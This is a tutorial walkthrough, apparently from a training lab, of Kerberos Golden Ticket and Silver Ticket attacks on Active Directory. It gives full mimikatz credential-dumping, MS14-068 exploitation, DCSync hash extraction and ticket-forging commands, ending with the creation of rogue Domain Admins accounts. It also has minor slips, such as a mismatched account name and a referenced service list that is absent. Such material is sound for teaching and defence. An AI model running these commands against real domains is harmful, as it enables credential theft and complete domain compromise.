Ticket Passing Attacks

This section introduces two common attack methods within a domain: the Golden Ticket and the Silver Ticket.

Furthermore, readers familiar with the Kerberos authentication process will find the principles of these two attacks considerably easier to comprehend. For those who have not previously studied Kerberos authentication, it is recommended to familiarize on the Kerberos Authentication Process.

Related Tools

• Ms14‑068
• PSexec
• mimikatz

Golden Ticket

Principle

During Kerberos authentication, after the Client authenticates with the Authentication Service (AS), the AS issues a Logon Session Key and a Ticket‑Granting Ticket (TGT) to the Client. The Logon Session Key is not retained within the Key Distribution Centre (KDC), whereas the NTLM hash of the krbtgt account is fixed. Consequently, if an attacker obtains the NTLM hash of krbtgt, it becomes possible to forge both a TGT and the corresponding Logon Session Key, thereby enabling the Client to proceed to the interaction with the Ticket‑Granting Service (TGS). Possession of a Golden Ticket permits the bypass of AS validation entirely; neither account name nor password is verified, and the attacker remains unaffected even if the domain administrator password is subsequently changed.

Characteristics

• Does not require any interaction with the AS.
• Requires the NTLM hash of the krbtgt user.

Detailed Procedure

1. Forging Credentials to Escalate Privileges of a Domain User

Assume that an attacker has logged on to a host within the domain as a local Administrator.

The command net config workstation reveals, among other details, that the domain is named cyberpeace.

The command nltest /dsgetdc:domain identifies the Domain Controller hostname as scene.

Mimikatz is uploaded and executed with administrator privileges:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

Examination of the generated log.txt reveals a domain user account, devuser, with the password HOTdev123456.

Logging in as devuser and running whoami confirms the current user context.

The presence of the MS14‑068 vulnerability (CVE‑2014‑6324, addressed by patch 3011780) is checked with the command systeminfo | find "3011780". An empty result indicates the patch is absent and the system is vulnerable. It should be noted that privilege escalation using this vulnerability is time‑limited.

An attempt to access the administrative share on the domain controller with dir \\scene.cyberpeace.com\c$ fails owing to insufficient permissions.

The MS14‑068 exploit tool and mimikatz are uploaded. The user’s SID is obtained using either whoami /user or whoami /all.

The MS14‑068 tool is used to forge a ticket:

C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-97341123-1865264218-933115267-1108 -d scene.cyberpeace.com

A TGT ticket file is generated in the current directory. The general usage is:

ms14-068.exe -u <domain_user>@<domain> -p <password> -s <user_SID> -d <domain_controller>

Within mimikatz, the existing Kerberos ticket cache is purged and the forged ticket is imported:

mimikatz # kerberos::purge
mimikatz # kerberos::ptc <path_to_ticket_file>

The command dir \\scene.cyberpeace.com\c$ now executes successfully, demonstrating that domain administrator privileges have been obtained.

A new domain administrator account, aaa, is created:

net user aaa Qwe123... /add /domain
net group "Domain Admins" aaa /add /domain

2. Forging a Golden Ticket

Prerequisites for forging a Golden Ticket

1. Domain name
2. Domain SID value
3. NTLM hash of the krbtgt account
4. Arbitrary username to be forged

Logging in as the domain administrator aaa and executing whoami confirms the identity.

The NTLM hash of krbtgt is extracted using the following mimikatz commands:

mimikatz(commandline) # privilege::debug
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /all /csv
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /user:krbtgt

The SID of the krbtgt account is displayed in the output.

Mimikatz is then employed to generate the Golden Ticket and save it as a .kirbi file:

mimikatz.exe "kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi" exit

• /admin : forged username
• /domain : domain name
• /sid : domain SID (note: the last component after the final hyphen is omitted)
• /krbtgt : NTLM hash of krbtgt
• /ticket : name of the generated ticket file

3. Using the Golden Ticket (Creating a Domain Admin Account from a Standard Domain Account)

The attacker logs into the domain with an ordinary user account. Using mimikatz, the previously generated ticket.kirbi is loaded into memory:

mimikatz # kerberos::purge
mimikatz # kerberos::ptt ticket.kirbi

At this point, an attempt to create a domain administrator account named ccc succeeds.

Silver Ticket

Principle

If the Golden Ticket represents a forged TGT, then the Silver Ticket corresponds to a forged Service Ticket (ST). During the third stage of Kerberos authentication, the Client presents the ST together with Authenticator3 to a service hosted on a particular server. The server decrypts the ST using its own Master Key (derived from the service account’s hash) to obtain the Session Key. It then decrypts Authenticator3 with that Session Key to verify the Client’s identity. If verification succeeds, the Client is granted access to the designated service.

Thus, if an attacker knows the NTLM hash of the service account associated with the target server, a valid ST can be forged without any communication with the KDC. However, such a forged ticket is functional only for the specific service for which it was crafted.

Characteristics

1. Does not require interaction with the KDC.
2. Requires the NTLM hash of the target service account.

Detailed Procedure

1. Forging Credentials to Escalate Privileges of a Domain User

Again, the attack begins from a local Administrator account on a domain‑joined host.

The command net config workstation reveals the domain name as cyberpeace.

The domain controller hostname scene is obtained with nltest /dsgetdc:domain.

Mimikatz is executed with administrator rights:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

The log file shows a domain user account, Hellen, with the password Hellen1818.

After logging in as Hellen, whoami confirms the user context.

The presence of the MS14‑068 vulnerability is verified.

Access to the administrative share is initially denied.

The exploit tool and mimikatz are uploaded, and the user’s SID is retrieved.

A ticket is forged with MS14‑068:

MS14-068.exe -u Hellen@cyberpeace.com -p Hellen1818 -s S-1-5-21-2718660907-658632824-2072795563-1110 -d DomainControl.cyberpeace.com

The generic syntax is:

ms14-068.exe -u <domain_user>@<domain> -p <password> -s <user_SID> -d <domain_controller>

Inside mimikatz, the old tickets are purged and the forged ticket is imported:

mimikatz # kerberos::purge
mimikatz # kerberos::ptc <path_to_ticket_file>

The command dir \\scene.cyberpeace.com\c$ now succeeds, indicating domain administrator privileges.

A domain administrator account ccc is created:

net user ccc Qwe1234 /add /domain
net group "Domain Admins" cccc /add /domain

2. Forging a Silver Ticket

Logging in as the newly created domain administrator, mimikatz is run with administrator privileges to extract the necessary SID and NTLM hash:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

The hash and mimikatz are then copied to a local account on a domain‑joined machine. After purging the existing ticket cache, the silver ticket is forged and passed directly into the session using the following command:

kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt

The general usage pattern is:

kerberos::golden /domain:<domain> /sid:<domain_SID> /target:<target_server> /service:<service_type> /rc4:<NTLM_hash> /user:<username> /ptt

The <username> may be chosen arbitrarily.

Since no TGT is available to repeatedly request tickets, the attacker must target a specific service. The service type can be selected from the list below.

The command dir \\scene.cyberpeace.com\c$ executes successfully, and a domain administrator account can be created.

Differences between Golden and Silver Tickets

Scope of Access

• Golden Ticket: Forges a TGT, thereby granting access to any Kerberos‑protected service.
• Silver Ticket: Forges an ST, granting access only to the specific service for which it was crafted (e.g., CIFS).

Authentication Flow

• Golden Ticket: Interacts with the KDC but does not interact with the AS.
• Silver Ticket: Does not interact with the KDC at all; it communicates directly with the target server.

Encryption Mechanism

• Golden Ticket: Encrypted with the NTLM hash of krbtgt.
• Silver Ticket: Encrypted with the NTLM hash of the service account associated with the target server.

---